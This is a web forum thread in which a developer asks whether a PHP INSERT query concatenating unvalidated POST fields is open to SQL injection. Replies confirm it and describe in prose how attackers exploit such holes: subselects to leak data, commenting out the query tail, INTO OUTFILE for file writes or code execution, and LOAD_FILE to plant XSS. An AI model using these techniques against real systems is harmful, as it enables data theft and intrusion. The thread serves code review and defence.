SQLi susecptible?
Moderator: General Moderators
-
alex.barylski
- DevNet Evangelist
- Posts: 6267
- Joined: Tue Dec 21, 2004 5:00 pm
- Location: Winnipeg
SQLi susecptible?
I have the following SQL I just stumbled upon and have checked all all previous code to ensure nothing was being changed...these $_POST globals are not validated and appear to be used inline with the SQL statement, injection waiting to occur or am I missing something?
[sql] $ins_qry_def="INSERT INTO PORTAL_USER (pu_id_admin, pu_id_sha1, pum_id, pu_licenses, spl_id, sp_id, wtc_id, usr, eml, pwd, pu_salute, pu_fname, pu_mname, pu_lname, trusted, active, userid, datemod)VALUES (NULL, NULL, "."'".($_POST['memtype']==2 ? "3" : $_POST['memtype'])."'".", "."'".($_POST['memtype']== 3 ? "5" : $_POST['memtype']==2 ? "1" : "0")."'".", '0', '0', '0', "."'".mssql_escape($_POST['username'])."'".", "."'".mssql_escape($_POST['emaiaddr'])."'".", "."'".$_POST['password']."'".", NULL, "."'".mssql_escape($_POST['firsname'])."'".", NULL, "."'".mssql_escape($_POST['lastname'])."'".", '0', '1', '0', GETDATE())"; [/sql]
Is this code vulnerable to SQLi or not because the injected insecure variables are inside 'VALUES'?
What POST variable would be best used to carry out a SELECT to find all users in database or similar?
Seeing as I have never actually carried out a SQL exploit, would someone demonstrate using the code above as a starting point?
[sql] $ins_qry_def="INSERT INTO PORTAL_USER (pu_id_admin, pu_id_sha1, pum_id, pu_licenses, spl_id, sp_id, wtc_id, usr, eml, pwd, pu_salute, pu_fname, pu_mname, pu_lname, trusted, active, userid, datemod)VALUES (NULL, NULL, "."'".($_POST['memtype']==2 ? "3" : $_POST['memtype'])."'".", "."'".($_POST['memtype']== 3 ? "5" : $_POST['memtype']==2 ? "1" : "0")."'".", '0', '0', '0', "."'".mssql_escape($_POST['username'])."'".", "."'".mssql_escape($_POST['emaiaddr'])."'".", "."'".$_POST['password']."'".", NULL, "."'".mssql_escape($_POST['firsname'])."'".", NULL, "."'".mssql_escape($_POST['lastname'])."'".", '0', '1', '0', GETDATE())"; [/sql]
Is this code vulnerable to SQLi or not because the injected insecure variables are inside 'VALUES'?
What POST variable would be best used to carry out a SELECT to find all users in database or similar?
Seeing as I have never actually carried out a SQL exploit, would someone demonstrate using the code above as a starting point?
-
alex.barylski
- DevNet Evangelist
- Posts: 6267
- Joined: Tue Dec 21, 2004 5:00 pm
- Location: Winnipeg
Re: SQLi susecptible?
By the way this is a MSSQL database not sure if that changes anything?
Re: SQLi susecptible?
I think this line is vulnerable to SQL injections:
You may use a subselect query to insert some secret data from the DB into a record which you can view later.
Code: Select all
"."'".($_POST['memtype']==2 ? "3" : $_POST['memtype'])."'".",There are 10 types of people in this world, those who understand binary and those who don't
-
alex.barylski
- DevNet Evangelist
- Posts: 6267
- Joined: Tue Dec 21, 2004 5:00 pm
- Location: Winnipeg
Re: SQLi susecptible?
Can you show me how I might go about doing that? Why would I insert data? The argument has to be strong enough that it warrnats a re-design of an entire application -- it's beyond refactoring.You may use a subselect query to insert some secret data from the DB into a record which you can view later.
I figure if anything will get them to agree it'll be security issues which can expose their data.
Re: SQLi susecptible?
Just set the value of $_POST['memtype'] to a string which will construct a proper query for the attacked insert and add a "comment" char sequence at its end in order to remove the rest of the original query.
PS: I'm not sure we are permitted to discuss such things in this forum
PS: I'm not sure we are permitted to discuss such things in this forum
There are 10 types of people in this world, those who understand binary and those who don't
-
alex.barylski
- DevNet Evangelist
- Posts: 6267
- Joined: Tue Dec 21, 2004 5:00 pm
- Location: Winnipeg
Re: SQLi susecptible?
I have seen worse. 
Beside I don't think I have ever said or insinuated anything in the past to suggest I was interested in hacking. I joined a project really late and it's in serious need of repair.
Beside I don't think I have ever said or insinuated anything in the past to suggest I was interested in hacking. I joined a project really late and it's in serious need of repair.
- kaisellgren
- DevNet Resident
- Posts: 1675
- Joined: Sat Jan 07, 2006 5:52 am
- Location: Lahti, Finland.
Re: SQLi susecptible?
Yes it is vulnerable to SQL Injection attacks. I do not understand, you have mssql_escape() in the end of the query, but why did you not escape the "memtype" values? MySQL, for instance, allows an insert of "INSERT INTO ... SELECT", so an attacker can just close the parenthesis and start a SELECT clause and use something like SELECT INTO OUTFILE and save all your database info into a publicly readable file. That's just one example of exploiting that line. Another common way I like to crack web applications is that I upload an image to the server (many websites allow in a way or another) and that contains XSS, then I use the LOADFILE() command in MySQL to load the XSS into your database and most likely the data is being shown at some point in the application.
Re: SQLi susecptible?
It's even worse when a SELECT (not INSERT) query is vulnerable. In such case, a SQL injection using OUTFILE is the worst that could happen to a web application (leading to a successful RCE).kaisellgren wrote:Another common way I like to crack web applications is that I upload an image to the server (many websites allow in a way or another) and that contains XSS, then I use the LOADFILE() command in MySQL to load the XSS into your database and most likely the data is being shown at some point in the application.
@PCSpectra
I suspect that $_POST['memtype'] is validated somewhere in the code. Maybe a:
Code: Select all
$_POST['memtype'] = intval($_POST['memtype'])There are 10 types of people in this world, those who understand binary and those who don't
- kaisellgren
- DevNet Resident
- Posts: 1675
- Joined: Sat Jan 07, 2006 5:52 am
- Location: Lahti, Finland.
Re: SQLi susecptible?
I'm not sure which is the worst thing that could happen to an application. DROP statements being vulnerable could have catastrophical damage, while SELECT would allow both RCE and LFI and almost anything such as getting the /etc/passwd. I knew a guy whose hosting account was closed, because an attacker exploited a vulnerability in CREATE statement and made so much spam that the database became too big and the hosting company kicked the customer out of their servers and he lost all data including the nightly backupsVladSun wrote:It's even worse when a SELECT (not INSERT) query is vulnerable. In such case, a SQL injection using OUTFILE is the worst that could happen to a web application (leading to a successful RCE).kaisellgren wrote:Another common way I like to crack web applications is that I upload an image to the server (many websites allow in a way or another) and that contains XSS, then I use the LOADFILE() command in MySQL to load the XSS into your database and most likely the data is being shown at some point in the application.
@PCSpectra
I suspect that $_POST['memtype'] is validated somewhere in the code. Maybe a:line could be found.Code: Select all
$_POST['memtype'] = intval($_POST['memtype'])
Re: SQLi susecptible?
A RCE would permit you to do anything you want (i.e. as Apache user) - including DROP, CREATE, exposing local files, etc. That's why I think that RCE is one of the worst exploits that could happen to a web application.
PS: BTW, I still encourage you to participate in the hack game I offered you earlier - it's "this is a web site - root its server". I haven't played such a game at other hack-game sites.
PS: BTW, I still encourage you to participate in the hack game I offered you earlier - it's "this is a web site - root its server". I haven't played such a game at other hack-game sites.
There are 10 types of people in this world, those who understand binary and those who don't
- kaisellgren
- DevNet Resident
- Posts: 1675
- Joined: Sat Jan 07, 2006 5:52 am
- Location: Lahti, Finland.
Re: SQLi susecptible?
You can also end up in a similar situation using an LFI providing that you have the skills, the time and the interest.VladSun wrote:A RCE would permit you to do anything you want (i.e. as Apache user) - including DROP, CREATE, exposing local file, etc. That's why I thing that RCE is one of the worst exploits that could happen to a web application.
PS: BTW, I still encourage you to participate in the hack game I offered you earlier - it's "this is a web site - root its server". I haven't played such a game at other hack-game sites.
Isn't it spelled an LFI, an RCE, an SQL Injection, because you use "an" whenever you say the first letter as a vowel, right? Just thinking.
What was the link to that website?
Re: SQLi susecptible?
http://www.gat3way.eu/hackkaisellgren wrote:What was the link to that website?
There are 10 types of people in this world, those who understand binary and those who don't
-
alex.barylski
- DevNet Evangelist
- Posts: 6267
- Joined: Tue Dec 21, 2004 5:00 pm
- Location: Winnipeg
Re: SQLi susecptible?
There is in many instances an explicit casting, etc that is done, but my first day I stumbled upon a line which didn't and when I mentioned it, the other developer ismply told me to cast.I suspect that $_POST['memtype'] is validated somewhere in the code. Maybe a:
Security like this, makes me nervous as hell. They appear to be using prepared statements or so has been said, but I'm not sure if it's secure still, as there are many dynamically generated SQL.
The developer before had the common sense to at least disable as DELETE's anytime a record is removed it actually only has a flag set which prevents it from being displayed. Not sure I aree with that design, but at least in an adhoc environment it prevents the DB from being trashed. Oddly he appears to have a religious backup strategy.